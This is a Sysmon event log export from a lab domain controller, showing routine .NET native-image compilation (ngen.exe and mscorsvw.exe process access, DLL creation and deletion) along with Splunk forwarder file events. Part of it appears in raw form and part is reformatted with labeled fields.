ws\SYSTEM32\ntdll.dll+51781 23542300x800000000000000020156Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:36.128{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E14CD5CFC78D89455F496112E646C23,SHA256=BB8B1F6DBE506E6CF2A3FE564E4137C42DECAE32286A0A0D2A606D9E9B002C35,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020155Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:36.112{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1A8-60D3-4103-00000000CF01}6316C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020154Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:36.112{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1A8-60D3-4103-00000000CF01}6316C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020153Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:03:36.097{4DB9351A-A1A7-60D3-4003-00000000CF01}6724C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1a44-0\Microsoft.ActiveDirectory.TRLParser.dll2021-06-23 21:03:36.097 23542300x800000000000000020185Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:37.940{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=38D840185DAAF35E5CCD3573E8913D4A,SHA256=63ABA053485595C88B1DA574E7B7573B946B415B06AE40AD34D0A7059F37C795,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020184Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:37.628{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1A9-60D3-4903-00000000CF01}2612C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020183Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:37.597{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1A9-60D3-4903-00000000CF01}2612C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020182Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:37.597{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1A9-60D3-4903-00000000CF01}2612C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000020181Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:37.300{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1A9-60D3-4803-00000000CF01}5464C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000020180Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:37.268{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=63CE6A59221F518B52543416808F6B8D,SHA256=7CA87F7355386DCF29889534B9956E657A5A5C304B063EA0E3496436AFC83EDA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020179Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:37.253{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1A9-60D3-4803-00000000CF01}5464C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020178Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:37.253{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1A9-60D3-4803-00000000CF01}5464C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000020177Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:37.206{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1A9-60D3-4703-00000000CF01}6252C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020176Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:37.190{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1A9-60D3-4703-00000000CF01}6252C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020175Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:37.190{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1A9-60D3-4703-00000000CF01}6252C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000020202Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:38.879{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1AA-60D3-4D03-00000000CF01}4584C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020201Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:38.862{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1AA-60D3-4D03-00000000CF01}4584C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020200Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:38.862{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1AA-60D3-4D03-00000000CF01}4584C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000020199Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:38.784{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1AA-60D3-4C03-00000000CF01}5240C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020198Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:38.768{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1AA-60D3-4C03-00000000CF01}5240C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020197Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:38.768{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1AA-60D3-4C03-00000000CF01}5240C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000020196Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:38.706{4DB9351A-A1AA-60D3-4B03-00000000CF01}3780NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\ARAU4TET2A\Microsoft.Activities.Build.ni.dll.auxMD5=B6E470B62D8052BD786D531762D68CD3,SHA256=5B37AA355AB4EE027D87CB37BA89E80DCEE95C41E3926E96679ABD822FB0677B,IMPHASH=00000000000000000000000000000000falsetrue 
Microsoft-Windows-Sysmon/Operational events from win-dc-663.attackrange.local, one record per line with fields labeled per the Sysmon event schema. Every record carries Level=4, Opcode=0 and Keywords=0x8000000000000000; Version=5 for EventID 3 and 23, Version=3 for EventID 10, Version=2 for EventID 11. The export runs SourceProcessId and SourceThreadId together in ProcessAccess records; the split shown is inferred from the values repeating across records.

EventRecordID=20195; EventID=23 (FileDelete); RuleName=-; UtcTime=2021-06-23 21:03:38.706; ProcessGuid={4DB9351A-A1AA-60D3-4B03-00000000CF01}; ProcessId=3780; User=NT AUTHORITY\SYSTEM; Image=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; TargetFilename=C:\Windows\assembly\temp\ARAU4TET2A\Microsoft.Activities.Build.ni.dll; Hashes=MD5=BD7BD1F4B94D5941F79BFA0D5721181C,SHA256=E66F8444FD8F5AD3F329F97F44E2E95C4181C057CB7C5A0EED0EBB6B6BE66F75,IMPHASH=00000000000000000000000000000000; IsExecutable=true; Archived=true
EventRecordID=20194; EventID=11 (FileCreate); RuleName=DLL; UtcTime=2021-06-23 21:03:38.690; ProcessGuid={4DB9351A-A1AA-60D3-4B03-00000000CF01}; ProcessId=3780; Image=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; TargetFilename=C:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\ec4-0\Microsoft.Activities.Build.dll; CreationUtcTime=2021-06-23 21:03:38.690
EventRecordID=20193; EventID=10 (ProcessAccess); RuleName=-; UtcTime=2021-06-23 21:03:38.581; SourceProcessGUID={4DB9351A-9DDD-60D3-0C00-00000000CF01}; SourceProcessId=844; SourceThreadId=368; SourceImage=C:\Windows\system32\svchost.exe; TargetProcessGUID={4DB9351A-A1AA-60D3-4B03-00000000CF01}; TargetProcessId=3780; TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; GrantedAccess=0x1000; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
EventRecordID=20192; EventID=10 (ProcessAccess); RuleName=-; UtcTime=2021-06-23 21:03:38.550; SourceProcessGUID={4DB9351A-9DDB-60D3-0500-00000000CF01}; SourceProcessId=412; SourceThreadId=432; SourceImage=C:\Windows\system32\csrss.exe; TargetProcessGUID={4DB9351A-A1AA-60D3-4B03-00000000CF01}; TargetProcessId=3780; TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; GrantedAccess=0x1fffff; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f
EventRecordID=20191; EventID=10 (ProcessAccess); RuleName=-; UtcTime=2021-06-23 21:03:38.550; SourceProcessGUID={4DB9351A-A039-60D3-1801-00000000CF01}; SourceProcessId=5388; SourceThreadId=6420; SourceImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe; TargetProcessGUID={4DB9351A-A1AA-60D3-4B03-00000000CF01}; TargetProcessId=3780; TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; GrantedAccess=0x103801; 